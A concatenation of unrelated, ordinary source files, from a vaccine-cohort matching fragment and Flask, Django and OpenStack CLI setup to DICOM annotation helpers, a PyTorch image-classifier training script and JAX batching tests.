verbose: print("Criando reservatório de controles ...") # Get the main outcomes' dates for each eligible individual of the cohort. col_names = { "D1": "data D1(VACINADOS)", "D2": "data D2(VACINADOS)", "OBITO COVID": "data_obito(OBITO COVID)", "OBITO GERAL": "data falecimento(CARTORIOS)" } print("Coletando datas para toda população considerada ...") matching_utils.collect_dates_for_cohort(df_pop, control_reservoir, control_dates, col_names) print("Coletando datas para toda população considerada ... Concluído.") matching_utils.rearrange_controls(control_reservoir, seed) print("Executando pareamento ...") pareados, matched = matching_utils.perform_matching(datelst, df_vaccinated, control_reservoir, control_used, control_dates, col_names) print("Executando pareamento ... Concluído.") events_df = matching_utils.get_events(df_pop, pareados, matched, col_names) df_pop["PAREADO"] = df_pop["cpf"].apply(lambda x: "SIM" if matched[x] else "NAO") return events_df, df_pop
from flask import Flask from hymns import bp from db import init_db def create_app(): # create and configure the app app: Flask = Flask(__name__) # create database connection with app.app_context(): # make the db connection to have access to the db instance # in the API blueprint. # I haven't figured a better way yet app.db = init_db(app) # register the blueprint app.register_blueprint(bp) return app if __name__ == "__main__": create_app()
# Copyright (c) 2017 StackHPC Ltd. # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. import sys from cliff.app import App from cliff.commandmanager import CommandManager import os_client_config def get_cloud_config(): # TODO(johngarbutt) consider passing in argument parser return os_client_config.get_config() def get_client(cloud_config, service_type): return cloud_config.get_session_client(service_type) class CapacityApp(App): def __init__(self): super(CapacityApp, self).__init__( description='OS-Capacity (StackHPC) Command Line Interface (CLI)', version='0.1', command_manager=CommandManager('os_capacity.commands'), deferred_help=True, ) def initialize_app(self, argv): self.LOG.debug('initialize_app') config = os_client_config.get_config() self.compute_client = config.get_session_client("compute") self.placement_client = config.get_session_client("placement") self.monitoring_client = config.get_session_client("monitoring") self.identity_client = config.get_session_client("identity") self.LOG.debug('setup Keystone API REST clients') def prepare_to_run_command(self, cmd): self.LOG.debug('prepare_to_run_command %s', cmd.__class__.__name__) def clean_up(self, cmd, result, err): self.LOG.debug('clean_up %s', cmd.__class__.__name__) if err: self.LOG.debug('got an error: %s', err) def main(argv=sys.argv[1:]): myapp = CapacityApp() return myapp.run(argv) if __name__ == '__main__': sys.exit(main(sys.argv[1:]))
n = int(input("Digite o valor de n: ")) impar = 1 i = 1 while i <= n: print(impar) impar = impar + 2 i = i + 1
main = [{'category': 'Proof of Address', 'note': 'Select all documents acceptable for proof of address verification.', 'field': {'utility_bill': 'Utility Bill', 'bank_statement': 'Bank Statement', 'lease_or_rental_agreement': 'Lease or Rental Agreement', 'municipal_rate_and_taxes': 'Municipal Rate and Taxes Invoice', 'mortgage_statement': 'Mortgage Statement', 'telephone': 'Telephone or Cellular Account', 'insurance_policy': 'Insurance Policy Document', 'retail_store': 'Statement of Account Issued by a Retail Store'}}, {'category': 'Proof of Identity', 'note': 'Select all documents acceptable for proof of identity verification.', 'field': {'government_id': 'Government Issued ID', 'passport': 'Passport', 'drivers_license': 'Drivers License'}}, {'category': 'Advanced Proof of Identity', 'note': 'Select all documents acceptable for advanced proof of identity verification.', 'field': {'id_confirmation': 'ID Confirmation Photo'}}] template_list = main def choice_list(): c = [] for l in main: for k, v in l['field'].items(): c.append([k, v]) c.append(['other', 'Other']) t = tuple(tuple(x) for x in c) return t
"""This module contains monitor genrules.""" load("//lib/bazel:py_rules.bzl", "py_binary") def _monitor_genrule(monitor_name, name, deps, **kwargs): py_binary( name = "generate_" + name, srcs = [ "//avionics/firmware/monitors:generate_" + monitor_name + "_monitor.py", "//avionics/firmware/monitors:generate_monitor_base.py", name + ".py", ], main = "//avionics/firmware/monitors:generate_" + monitor_name + "_monitor.py", deps = deps + [ "//avionics/firmware/monitors:generate_monitor_base", ], ) native.genrule( name = name + "_genrule", srcs = [name + ".py"], outs = [ name + "_types.c", name + "_types.h", ], tools = [":generate_" + name], cmd = " ".join([ "$(location :generate_" + name + ")", "--autogen_root=$(GENDIR)", "--prefix=" + name, "--config_file=$(location " + name + ".py)", "--source_file=$(location " + name + "_types.c)", "--header_file=$(location " + name + "_types.h)", ]), ) def ads7828_genrule(name, deps, **kwargs): _monitor_genrule("ads7828", name, deps, **kwargs) def analog_genrule(name, deps, **kwargs): _monitor_genrule("analog", name, deps, **kwargs) def bq34z100_genrule(name, deps, **kwargs): _monitor_genrule("bq34z100", name, deps, **kwargs) def ina219_genrule(name, deps, **kwargs): _monitor_genrule("ina219", name, deps, **kwargs) def ltc2309_genrule(name, deps, **kwargs): _monitor_genrule("ltc2309", name, deps, **kwargs) def ltc4151_genrule(name, deps, **kwargs): _monitor_genrule("ltc4151", name, deps, **kwargs) def ltc6804_genrule(name, deps, **kwargs): _monitor_genrule("ltc6804", name, deps, **kwargs) def mcp342x_genrule(name, deps, **kwargs): _monitor_genrule("mcp342x", name, deps, **kwargs) def mcp9800_genrule(name, deps, **kwargs): _monitor_genrule("mcp9800", name, deps, **kwargs) def si7021_genrule(name, deps, **kwargs): _monitor_genrule("si7021", name, deps, **kwargs)
"""MapGo_server URL Configuration The `urlpatterns` list routes URLs to views. For more information please see: https://docs.djangoproject.com/en/3.2/topics/http/urls/ Examples: Function views 1. Add an import: from my_app import views 2. Add a URL to urlpatterns: path('', views.home, name='home') Class-based views 1. Add an import: from other_app.views import Home 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home') Including another URLconf 1. Import the include() function: from django.urls import include, path 2. Add a URL to urlpatterns: path('blog/', include('blog.urls')) """ from django.conf import settings from django.conf.urls import include from django.conf.urls.static import static from django.contrib import admin from django.urls import path from rest_framework import routers from checkin.views import CheckinViewSet from recommend.views import STCViewSet routers = { "checkin": routers.DefaultRouter(), "recommend": routers.DefaultRouter(), } routers["checkin"].register('Mapgo/checkin', CheckinViewSet, basename='checkin') routers["recommend"].register('Mapgo/recommend', STCViewSet, basename='recommend') urlpatterns = [ path('admin/', admin.site.urls), path('', include(routers["checkin"].urls)), path('Mapgo/checkin/<str:userid>/', CheckinViewSet.as_view({'delete': 'delete'})), path('', include(routers["recommend"].urls)), path('Mapgo/sns/', include('sns.urls')), ] + static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)
from collections.abc import Mapping from typing import Any, Iterator, Optional, Tuple import attr from fontTools.misc.transform import Identity, Transform from .misc import _convert_transform @attr.s(auto_attribs=True, slots=True) class Image(Mapping): """Represents a background image reference. See http://unifiedfontobject.org/versions/ufo3/images/ and http://unifiedfontobject.org/versions/ufo3/glyphs/glif/#image. """ fileName: Optional[str] = None """The filename of the image.""" transformation: Transform = attr.ib(default=Identity, converter=_convert_transform) """The affine transformation applied to the image.""" color: Optional[str] = None """The color applied to the image.""" def clear(self) -> None: """Resets the image reference to factory settings.""" self.fileName = None self.transformation = Identity self.color = None def __bool__(self) -> bool: """Indicates whether fileName is set.""" return self.fileName is not None # implementation of collections.abc.Mapping abstract methods. # the fontTools.ufoLib.validators.imageValidator requires that image is a # subclass of Mapping... _transformation_keys_: Tuple[str, str, str, str, str, str] = ( "xScale", "xyScale", "yxScale", "yScale", "xOffset", "yOffset", ) _valid_keys_: Tuple[str, str, str, str, str, str, str, str] = ( "fileName", *_transformation_keys_, "color", ) def __getitem__(self, key: str) -> Any: try: i = self._transformation_keys_.index(key) except ValueError: try: return getattr(self, key) except AttributeError: raise KeyError(key) else: return self.transformation[i] def __len__(self) -> int: return len(self._valid_keys_) def __iter__(self) -> Iterator[str]: return iter(self._valid_keys_)
from datetime import datetime import pydicom from pydicom.dataset import Dataset, DataElement, Tag from pydicom.sequence import Sequence def get_gsps_file_metadata(): file_meta = Dataset() file_meta.MediaStorageSOPClassUID = "1.2.840.10008.5.1.4.1.1.11.1" # Grayscale Softcopy Presentation State Storage SOP Class file_meta.MediaStorageSOPInstanceUID = pydicom.uid.generate_uid() file_meta.ImplementationClassUID = "1.2.276.0.7230010.3.0.3.4.1" file_meta.ImplementationVersionName = "GSPS_DEMO" return file_meta def set_gsps_general_study_info(dataset, file_meta, series_instance_uid): dataset.SOPClassUID = file_meta.MediaStorageSOPClassUID dataset.SOPInstanceUID = file_meta.MediaStorageSOPInstanceUID dataset.AccessionNumber = "" dataset.Modality = "PR" # Presentation State dataset.Manufacturer = "" dataset.SeriesDescription = "GSPS demo" dataset.SeriesInstanceUID = series_instance_uid dataset.SeriesNumber = 1 dataset.InstanceNumber = 1 dataset.ContentLabel = "GSPS_demo" dataset.PresentationCreationDate = datetime.now().date().strftime("%Y%m%d") dataset.PresentationCreationTime = datetime.now().time().strftime("%H%M%S") dataset.ContentCreatorName = "GSPS^demo" dataset.PresentationLUTShape = "IDENTITY" return dataset def set_content_desription(dataset, description): dataset.ContentDescription = description return dataset def set_referenced_image_info(dataset, series_instance_uid, sop_class_uid, sop_instance_uid): referenced_series_dataset = Dataset() referenced_series_dataset.SeriesInstanceUID = series_instance_uid referenced_image_dataset = Dataset() referenced_image_dataset.ReferencedSOPClassUID = sop_class_uid referenced_image_dataset.ReferencedSOPInstanceUID = sop_instance_uid referenced_series_dataset.ReferencedImages = Sequence([referenced_image_dataset]) dataset.ReferencedSeries = Sequence([referenced_series_dataset]) return dataset def copy_details_from_input_dicom(dicom, input_dicom): data_elements = ['PatientID', 'PatientBirthDate', 'StudyInstanceUID', 'StudyDescription', 'PatientName', 'PatientSex', 'StudyID', 'StudyDate', 'StudyTime', 'ReferringPhysicianName', 'AccessionNumber'] for de in input_dicom: if de.name in data_elements: dicom.add(input_dicom.data_element(de.name)) return dicom def add_graphic_annotation(dicom, group_number, layer, type, origin, rows, columns, data): dicom[group_number, 0x1001] = DataElement(Tag(group_number, 0x1001), "CS", layer) dicom[group_number, 0x40] = DataElement(Tag(group_number, 0x40), "CS", type) dicom[group_number, 0x50] = DataElement(Tag(group_number, 0x50), "SS", origin) dicom[group_number, 0x10] = DataElement(Tag(group_number, 0x10), "US", rows) dicom[group_number, 0x11] = DataElement(Tag(group_number, 0x11), "US", columns) dicom[group_number, 0x100] = DataElement(Tag(group_number, 0x100), "US", 1) # OverlayBitsAllocated dicom[group_number, 0x102] = DataElement(Tag(group_number, 0x102), "US", 0) # OverlayBitPosition dicom[group_number, 0x3000] = DataElement(Tag(group_number, 0x3000), "OW", data) return dicom def add_graphic_layer(dicom, layer_name, layer_description, layer_order): ds_graphic_layer = Dataset() ds_graphic_layer.GraphicLayer = layer_name ds_graphic_layer.GraphicLayerOrder = layer_order ds_graphic_layer.GraphicLayerRecommendedDisplayGrayscaleValue = 65535 ds_graphic_layer.GraphicLayerDescription = layer_description if dicom.get("GraphicLayers"): dicom.GraphicLayers.append(ds_graphic_layer) else: dicom.GraphicLayers = Sequence([ds_graphic_layer]) return dicom def add_displayed_area_selection(dicom, columns, rows): ds_displayed_area_selection = Dataset() ds_displayed_area_selection.DisplayedAreaTopLeftHandCorner = [1, 1] ds_displayed_area_selection.DisplayedAreaBottomRightHandCorner = [columns, rows] ds_displayed_area_selection.PresentationSizeMode = "SCALE TO FIT" ds_displayed_area_selection.PresentationPixelAspectRatio = [1, 1] dicom.DisplayedAreaSelections = Sequence([ds_displayed_area_selection]) return dicom def add_presentation_lut(dicom): # LUT - Look Up Table for colors ds_presentation_lut = Dataset() ds_presentation_lut.LUTDescriptor = [256, 0, 12] ds_presentation_lut.data_element("LUTDescriptor").VR = "US" ds_presentation_lut.LUTExplanation = "LUT with gamma 1.0, descriptor 256/0/12" ds_presentation_lut.LUTData = [0, 16, 32, 48, 64, 80, 96, 112, 128, 144, 160, 176, 192, 208, 224, 240, 256, 273, 289, 305, 321, 337, 353, 369, 385, 401, 417, 433, 449, 465, 481, 497, 513, 529, 546, 562, 578, 594, 610, 626, 642, 658, 674, 690, 706, 722, 738, 754, 770, 786, 802, 819, 835, 851, 867, 883, 899, 915, 931, 947, 963, 979, 995, 1011, 1027, 1043, 1059, 1075, 1092, 1108, 1124, 1140, 1156, 1172, 1188, 1204, 1220, 1236, 1252, 1268, 1284, 1300, 1316, 1332, 1348, 1365, 1381, 1397, 1413, 1429, 1445, 1461, 1477, 1493, 1509, 1525, 1541, 1557, 1573, 1589, 1605, 1621, 1638, 1654, 1670, 1686, 1702, 1718, 1734, 1750, 1766, 1782, 1798, 1814, 1830, 1846, 1862, 1878, 1894, 1911, 1927, 1943, 1959, 1975, 1991, 2007, 2023, 2039, 2055, 2071, 2087, 2103, 2119, 2135, 2151, 2167, 2184, 2200, 2216, 2232, 2248, 2264, 2280, 2296, 2312, 2328, 2344, 2360, 2376, 2392, 2408, 2424, 2440, 2457, 2473, 2489, 2505, 2521, 2537, 2553, 2569, 2585, 2601, 2617, 2633, 2649, 2665, 2681, 2697, 2713, 2730, 2746, 2762, 2778, 2794, 2810, 2826, 2842, 2858, 2874, 2890, 2906, 2922, 2938, 2954, 2970, 2986, 3003, 3019, 3035, 3051, 3067, 3083, 3099, 3115, 3131, 3147, 3163, 3179, 3195, 3211, 3227, 3243, 3259, 3276, 3292, 3308, 3324, 3340, 3356, 3372, 3388, 3404, 3420, 3436, 3452, 3468, 3484, 3500, 3516, 3532, 3549, 3565, 3581, 3597, 3613, 3629, 3645, 3661, 3677, 3693, 3709, 3725, 3741, 3757, 3773, 3789, 3805, 3822, 3838, 3854, 3870, 3886, 3902, 3918, 3934, 3950, 3966, 3982, 3998, 4014, 4030, 4046, 4062, 4078, 4095] ds_presentation_lut.data_element("LUTData").VR = "US" dicom.PresentationLUTSequence = Sequence([ds_presentation_lut]) return dicom def get_text_annotation(text, bounding_box, anchor_point=None): ds_text_object = Dataset() ds_text_object.BoundingBoxAnnotationUnits = bounding_box["BoundingBoxAnnotationUnits"] ds_text_object.UnformattedTextValue = text ds_text_object.BoundingBoxTopLeftHandCorner = bounding_box["BoundingBoxTopLeftHandCorner"] ds_text_object.BoundingBoxBottomRightHandCorner = bounding_box["BoundingBoxBottomRightHandCorner"] ds_text_object.BoundingBoxTextHorizontalJustification = "LEFT" if anchor_point is not None: ds_text_object.AnchorPointAnnotationUnits = anchor_point["AnchorPointAnnotationUnits"] ds_text_object.AnchorPoint = anchor_point["AnchorPoint"] ds_text_object.AnchorPointVisibility = anchor_point["AnchorPointVisibility"] return ds_text_object def get_circle(cir_rad, cir_pos_x, cir_pos_y): ds_cir_object = Dataset() ds_cir_object.GraphicAnnotationUnits = "PIXEL" ds_cir_object.GraphicDimensions = 2 ds_cir_object.NumberOfGraphicPoints = 2 ds_cir_object.GraphicData = [ cir_pos_x, # x coordinate of middle of circle cir_pos_y, # y coordinate of middle of circle cir_pos_x, # x coordinate of point on circumference cir_pos_y + cir_rad] # y coordinate of point on circumference ds_cir_object.GraphicType = "CIRCLE" ds_cir_object.GraphicFilled = "N" return ds_cir_object def add_graphic_annotations(dicom, layer_name, graphic_objects, text_objects): ds_graphic_annotation = Dataset() ds_graphic_annotation.GraphicLayer = layer_name ds_graphic_annotation.GraphicObjects = Sequence(graphic_objects) ds_graphic_annotation.TextObjects = Sequence(text_objects) dicom.GraphicAnnotations = Sequence([ds_graphic_annotation]) return dicom
#!/usr/bin/env python3 import argparse import numpy as np import torch from torch import nn, optim from torchvision import datasets, transforms, models from collections import OrderedDict from workspace_utils import active_session class Train_class: @staticmethod def initialize(data_dir): train_dir = data_dir + '/train' valid_dir = data_dir + '/valid' test_dir = data_dir + '/test' train_data_transforms = transforms.Compose([transforms.RandomRotation(30), transforms.RandomResizedCrop(224), transforms.RandomHorizontalFlip(), transforms.ToTensor(), transforms.Normalize([0.485,0.456,0.406],[0.229,0.224,0.225])]) valid_data_transforms = transforms.Compose([transforms.Resize(256), transforms.RandomResizedCrop(224), transforms.ToTensor(), transforms.Normalize([0.485,0.456,0.406],[0.229,0.224,0.225])]) test_data_transforms = transforms.Compose([transforms.Resize(256), transforms.CenterCrop(224), transforms.ToTensor(), transforms.Normalize([0.485,0.456,0.406],[0.229,0.224,0.225])]) image_datasets = {} image_datasets["train"] = datasets.ImageFolder(train_dir, transform = train_data_transforms) image_datasets["valid"] = datasets.ImageFolder(valid_dir, transform = valid_data_transforms) image_datasets["test"] = datasets.ImageFolder(test_dir, transform = test_data_transforms) train_dataloader = torch.utils.data.DataLoader(image_datasets["train"], batch_size = 64, shuffle =True) valid_dataloader = torch.utils.data.DataLoader(image_datasets["valid"], batch_size = 32) test_dataloader = torch.utils.data.DataLoader(image_datasets["test"], batch_size = 32) print(f"Data loaded from {data_dir} directory.") return image_datasets, train_dataloader, valid_dataloader, test_dataloader @staticmethod def create_model(arch,h_u): if arch.lower() == "vgg13": model = models.vgg13(pretrained=True) else: model = models.densenet121(pretrained=True) for p in model.parameters(): p.requires_grad = False if arch.lower() =='vgg13': classifier = nn.Sequential(OrderedDict([ ('dropout1', nn.Dropout(0.1)), ('fc1', nn.Linear(25088,h_u)), ('relu1', nn.ReLU()), ('dropout2', nn.Linear(h_u, 102)), ('output', nn.LogSoftmax(dim=1)) ])) else: classifier = nn.Sequential(OrderedDict([ ('dropout1', nn.Dropout(0.1)), ('fc1', nn.Linear(1024,h_u)), ('relu1', nn.ReLU()), ('dropout2', nn.Linear(h_u, 102)), ('output', nn.LogSoftmax(dim=1)) ])) model.classifier = classifier print(f"Model built from {arch} and {hidden_units} hidden units.") return model def measure_validation(model, dataloader, criterion, device): loss = 0 accuracy = 0 with torch.no_grad(): for images, labels in iter(dataloader): images, labels = images.to(device), labels.to(device) output = model.forward(images) loss += criterion(output,labels).item() ps = torch.exp(output) equality = (labels.data == ps.max(dim = 1)[1]) accuracy += equality.type(torch.FloatTensor).mean() return loss,accuracy @staticmethod def train_model(model, train_dataloader, valid_dataloader, learning_rate, epochs, gpu): criterion = nn.NLLLoss() optimizer = optim.Adam(model.classifier.parameters(),lr=learning_rate) device = torch.device("cuda:0" if gpu else "cpu") model.to(device) print_ev = epochs running_loss = 0 steps = 0 running_loss = 0 train_accuracy = 0 with active_session(): for x in range(epochs): model.train() for images, labels in iter(train_dataloader): images, labels = images.to(device), labels.to(device) steps += 1 optimizer.zero_grad() output = model.forward(images) loss = criterion(output, labels) loss.backward() optimizer.step() running_loss += loss.item() ps = torch.exp(output) equality = (labels.data == ps.max(dim = 1)[1]) train_accuracy += equality.type(torch.FloatTensor).mean() if steps % print_ev == 0: model.eval() with torch.no_grad(): valid_lo , valid_acc = Train_class.measure_validation(model, valid_dataloader, criterion,device) print("E: {}/{}.. ".format(x+1, epochs), "T_Loss: {:.3f}.. ".format(running_loss/print_ev), "T_Accuracy: {:.3f}".format(train_accuracy/print_ev), "V_Loss: {:.3f}.. ".format(valid_lo/len(valid_dataloader)), "V_Accuracy: {:.3f}".format(valid_acc/len(valid_dataloader))) running_loss = 0 train_accuracy = 0 model.train() print("Done with the Training!") return model, optimizer, criterion '''usage: python train.py data_directory Prints out training loss, validation loss, and validation accuracy as the network trains Options: - Set directory to save checkpoints: python train.py data_dir --save_dir save_directory - Choose architecture: python train.py data_dir --arch "vgg13" - Set hyperparameters: python train.py data_dir --learning_rate 0.01 --hidden_units 512 --epochs 20 - Use GPU for training: python train.py data_dir --gpu ''' # Get the command line input into the scripts parser = argparse.ArgumentParser() # Basic usage: python train.py data_directory parser.add_argument('data_directory', action='store', default = 'flowers', help='Set directory to load training data') # Set directory to save checkpoints: python train.py data_dir --save_dir save_directory parser.add_argument('--save_dir', action='store', default = '.', dest='save_dir', help='Set directory to save checkpoints') # Choose architecture: python train.py data_dir --arch "vgg13" parser.add_argument('--arch', action='store', default = 'densenet121', dest='arch', help='Choose architecture: e.g., "vgg13"') # Set hyperparameters: python train.py data_dir --learning_rate 0.01 --hidden_units 512 --epochs 20 parser.add_argument('--learning_rate', action='store', default = 0.001, dest='learning_rate', help='Choose architecture learning rate') parser.add_argument('--hidden_units', action='store', default = 512, dest='hidden_units', help='Choose architecture hidden units') parser.add_argument('--epochs', action='store', default = 4, dest='epochs', help='Choose architecture number of epochs') # Use GPU for training: python train.py data_dir --gpu parser.add_argument('--gpu', action='store_true', default=False, dest='gpu', help='Use GPU for training, set a switch to true') parse_results = parser.parse_args() data_dir = parse_results.data_directory save_dir = parse_results.save_dir arch = parse_results.arch learning_rate = float(parse_results.learning_rate) hidden_units = int(parse_results.hidden_units) epochs = int(parse_results.epochs) gpu = parse_results.gpu # Load and preprocess data train_obj = Train_class() image_datasets, train_loader, valid_loader, test_loader = train_obj.initialize(data_dir) # Building and training the classifier model_init = train_obj.create_model(arch, hidden_units) model, optimizer, criterion = train_obj.train_model(model_init, train_loader, valid_loader, learning_rate, epochs, gpu) # Save the checkpoint model.to('cpu') model.class_to_idx = image_datasets['train'].class_to_idx checkpoint = {'model': model, 'state_dict': model.state_dict(), 'optimizer_state_dict': optimizer.state_dict, 'criterion': criterion, 'epochs': epochs, 'class_to_idx': model.class_to_idx} torch.save(checkpoint, save_dir + '/checkpoint.pth') if save_dir == ".": save_dir_name = "current folder" else: save_dir_name = save_dir + " folder" print(f'Checkpoint saved to {save_dir_name}.')
# Copyright 2018 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # https://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. from __future__ import absolute_import from __future__ import division from __future__ import print_function import numpy as onp from absl.testing import absltest from absl.testing import parameterized import jax.numpy as np from jax import test_util as jtu from jax.abstract_arrays import ShapedArray from jax import lax from jax.api import jit, grad, jvp, vjp, trace_to_jaxpr, jacfwd, jacrev from jax.api import vmap from jax.core import unit from jax.interpreters import partial_eval as pe from jax.util import partial, curry from jax.config import config config.parse_flags_with_absl() class BatchingTest(jtu.JaxTestCase): def testConstantFunction(self): ans = vmap(lambda x: 3)(onp.ones(4)) expected = 3 * onp.ones(4) self.assertAllClose(ans, expected, check_dtypes=False) def testNestedBatchingMatMat(self): matvec = vmap(np.vdot, in_axes=(0, None)) matmat = vmap(matvec, in_axes=(None, 1), out_axes=1) R = onp.random.RandomState(0).randn A = R(4, 3) B = R(3, 2) ans = matmat(A, B) expected = onp.dot(A, B) self.assertAllClose(ans, expected, check_dtypes=False) # this is a crude check that we only call a single dot def pv_like(x): aval = ShapedArray(onp.shape(x), onp.result_type(x)) return pe.PartialVal((aval, unit)) def make_jaxpr(fun, example_args): jaxpr, _, _, _ = trace_to_jaxpr(fun, map(pv_like, example_args)) return jaxpr jaxpr = make_jaxpr(matmat, (A, B)) self.assertEqual(len(jaxpr.eqns), 1) def testPerExampleGradients(self): def predict(params, inputs): for W, b in params: outputs = np.dot(W, inputs) + b inputs = np.tanh(outputs) return outputs def loss(params, data): inputs, targets = data predictions = predict(params, inputs) return np.sum((predictions - targets)**2) batch_size = 5 layer_sizes = [3, 2, 4] R = onp.random.RandomState(0).randn params = [(R(m, n), R(m)) for m, n in zip(layer_sizes[1:], layer_sizes[:-1])] input_vec = R(3) target_vec = R(4) datum = (input_vec, target_vec) input_batch = R(5, 3) target_batch = R(5, 4) batch = (input_batch, target_batch) ans = vmap(partial(grad(loss), params))(batch) for ans_pair, param_pair in zip(ans, params): dW, db = ans_pair W, b = param_pair self.assertEqual(dW.shape, (batch_size,) + W.shape) self.assertEqual(db.shape, (batch_size,) + b.shape) def testJacobians(self): def jacbwd(f, x): y, pullback = vjp(f, x) std_basis = onp.eye(onp.size(y)).reshape((-1,) + onp.shape(y)) jac_flat, = vmap(pullback, out_axes=onp.ndim(y))(std_basis) return jac_flat.reshape(onp.shape(y) + onp.shape(x)) def jacfwd(f, x): pushfwd = lambda v: jvp(f, (x,), (v,)) std_basis = onp.eye(onp.size(x)).reshape((-1,) + onp.shape(x)) y, jac_flat = vmap(pushfwd, out_axes=(None, 0))(std_basis) return jac_flat.reshape(onp.shape(y) + onp.shape(x)) R = onp.random.RandomState(0).randn A = R(4, 3) b = R(4) f = lambda x: np.tanh(np.dot(A, x) + b) x = R(3) self.assertAllClose(jacfwd(f, x), jacbwd(f, x), check_dtypes=False) def testBatchOfCompile(self): side = [] @jit def f(x): side.append(None) return x + x g = jit(vmap(f)) self.assertAllClose(g(onp.ones(2)), 2 * onp.ones(2), check_dtypes=False) self.assertEqual(len(side), 1) self.assertAllClose(g(2 * onp.ones(2)), 4 * onp.ones(2), check_dtypes=False) self.assertEqual(len(side), 1) def testSliceLax(self): fun = lambda x: lax.slice(x, (2,), (4,)) R = onp.random.RandomState(0).randn x = R(5, 10) ans = vmap(fun)(x) expected_ans = x[:, 2:4] self.assertAllClose(ans, expected_ans, check_dtypes=False) def testSliceNumpy(self): fun = lambda x: x[:, 2] R = onp.random.RandomState(0).randn x = R(10, 5, 3, 7) ans = vmap(fun)(x) expected_ans = x[:, :, 2] self.assertAllClose(ans, expected_ans, check_dtypes=False) def testNpMaximum(self): fun = lambda x: np.maximum(x, 0.0) R = onp.random.RandomState(0).randn x = R(10, 5, 3, 7) ans = vmap(fun)(x) expected_ans = onp.maximum(x, 0.0) self.assertAllClose(ans, expected_ans, check_dtypes=False) def testNpGtrThan(self): R = onp.random.RandomState(0).randn x = R(10, 5, 3, 7) ans = vmap(lambda x: x > 1.0)(x) expected_ans = x > 1.0 self.assertAllClose(ans, expected_ans, check_dtypes=True) def testNpMaximumPerExampleGrad(self): R = onp.random.RandomState(0).randn x = R(10, 5) W = R(5, 5) fun = lambda W, x: np.sum(np.maximum(np.dot(x, W), 0.0) ** 2) ans = vmap(partial(grad(fun), W))(x) W_t = np.transpose(W) for i in range(10): x_ex = x[i:i + 1] expected_ans = 2.0 * np.dot( np.maximum(np.dot(W_t, np.transpose(x_ex)), 0.0), x_ex) expected_ans = np.transpose(expected_ans) self.assertAllClose(ans[i], expected_ans, check_dtypes=False) def testDotGeneral(self): R = onp.random.RandomState(0).randn x = R(10, 3, 4, 5) y = R(10, 3, 5, 6) fun = lambda x, y: lax.dot_general(x, y, [((2,), (1,)), ((0,), (0,))]) ans = vmap(fun)(x, y) expected = lax.dot_general(x, y, [((3,), (2,)), ((0, 1), (0, 1))]) self.assertAllClose(ans, expected, check_dtypes=True) x = R(3, 4, 10, 5) y = R(3, 10, 5, 6) fun = lambda x, y: lax.dot_general(x, y, [((2,), (1,)), ((0,), (0,))]) ans = vmap(fun, in_axes=(2, 1))(x, y) fun = lambda x, y: lax.dot_general(x, y, [((2,), (1,)), ((0,), (0,))]) expected = onp.stack([fun(x[..., i, :], y[:, i, ...]) for i in range(10)]) self.assertAllClose(ans, expected, check_dtypes=True) x = R(3, 4, 5, 10) y = R(3, 5, 6) fun = lambda x, y: lax.dot_general(x, y, [((2,), (1,)), ((0,), (0,))]) ans = vmap(fun, in_axes=(3, None))(x, y) fun = lambda x, y: lax.dot_general(x, y, [((2,), (1,)), ((0,), (0,))]) expected = onp.stack([fun(x[..., i], y) for i in range(10)]) self.assertAllClose(ans, expected, check_dtypes=True) x = R(3, 4, 5) y = R(3, 5, 10, 6) fun = lambda x, y: lax.dot_general(x, y, [((2,), (1,)), ((0,), (0,))]) ans = vmap(fun, in_axes=(None, 2))(x, y) fun = lambda x, y: lax.dot_general(x, y, [((2,), (1,)), ((0,), (0,))]) expected = onp.stack([fun(x, y[..., i, :]) for i in range(10)]) self.assertAllClose(ans, expected, check_dtypes=True) def testDot(self): # these tests are based on @shoyer's notebook studying gufuncs def vecvec(a, b): dot = np.dot for ndim in range(1, max(a.ndim, b.ndim)): a_ax = 0 if a.ndim > ndim else None b_ax = 0 if b.ndim > ndim else None dot = vmap(dot, in_axes=(a_ax, b_ax)) return dot(a, b) assert vecvec(np.zeros((3,)), np.zeros((3,))).shape == () assert vecvec(np.zeros((2, 3)), np.zeros((3,))).shape == (2,) # TODO(mattjj): this fails due to an xla error in dot_general # assert vecvec(np.zeros((4, 2, 3)), np.zeros((3,))).shape == (4, 2) def testPad(self): R = onp.random.RandomState(0).randn fun = lambda x: lax.pad(x, onp.float32(0), [(1, 2, 1)]) x = R(5, 10).astype(onp.float32) ans = vmap(fun)(x) expected_ans = np.stack(list(map(fun, x))) self.assertAllClose(ans, expected_ans, check_dtypes=False) fun = lambda x: lax.pad(x, onp.float32(0), [(1, 2, 1), (0, 1, 0)]) x = R(5, 10, 3).astype(onp.float32) ans = vmap(fun)(x) expected_ans = np.stack(list(map(fun, x))) self.assertAllClose(ans, expected_ans, check_dtypes=False) def testConcatenate(self): R = lambda *shape: onp.random.RandomState(0).randn(*shape).astype(onp.float32) fun = lambda *args: lax.concatenate(args, dimension=0) x, y, z = R(10, 2, 3), R(1, 10, 3), R(4, 3) ans = vmap(fun, in_axes=(0, 1, None))(x, y, z) expected_ans = onp.concatenate([x, onp.swapaxes(y, 0, 1), onp.broadcast_to(z, (10, 4, 3))], 1) self.assertAllClose(ans, expected_ans, check_dtypes=False) fun = lambda *args: lax.concatenate(args, dimension=1) x, y, z = R(10, 2, 1), R(2, 3), R(2, 4, 10) ans = vmap(fun, in_axes=(0, None, 2))(x, y, z) expected_ans = onp.concatenate([x, onp.broadcast_to(y, (10, 2, 3)), onp.moveaxis(z, 2, 0)], 2) self.assertAllClose(ans, expected_ans, check_dtypes=False) def testJacobianIssue54(self): # test modeling the code in https://github.com/google/jax/issues/54 def func(xs): return np.array([x for x in xs]) xs = np.ones((5, 1)) jacrev(func)(xs) # don't crash jacfwd(func)(xs) # don't crash def testAny(self): # test modeling the code in https://github.com/google/jax/issues/108 ans = vmap(np.any)(np.array([[True, False], [False, False]])) expected = np.array([True, False]) 